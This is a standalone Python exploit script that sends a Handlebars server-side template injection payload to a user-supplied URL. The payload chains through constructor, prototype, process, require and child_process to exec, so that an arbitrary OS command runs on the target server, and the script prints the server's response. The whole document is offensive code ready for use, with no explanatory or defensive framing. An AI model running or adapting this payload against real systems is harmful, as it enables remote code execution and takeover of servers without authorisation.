import requests

# Timeout for requests
TIMEOUT = 5

def exploit(url, command):
    """
    Send a malicious payload to the target URL to execute a command.
    """
    print(f"[+] Sending exploit payload to {url}...")

    # Crafting the malicious Handlebars payload for RCE
    payload = (
        "{{#with \"constructor\"}}"
        "{{#with prototype}}"
        "{{#with \"process\"}}"
        "{{#with mainModule.require}}"
        "{{#with \"child_process\"}}"
        "{{#with exec}}"
        "{{this \"" + command + "\"}}"
        "{{/with}}{{/with}}{{/with}}{{/with}}{{/with}}{{/with}}"
    )

    try:
        # Sending the payload through POST request
        response = requests.post(url, data={'template': payload}, timeout=TIMEOUT)

        if response.status_code == 200:
            print("[+] Payload executed successfully.")
            print("[+] Response:")
            print(response.text)
        else:
            print(f"[!] Exploit failed with status code: {response.status_code}")

    except requests.RequestException as e:
        print(f"[!] Error sending exploit: {str(e)}")

def main():
    target_url = input("Enter the target URL (e.g., http://example.com/render): ")
    command = input("Enter the OS command to execute: ")

    exploit(target_url, command)

if __name__ == "__main__":
    main()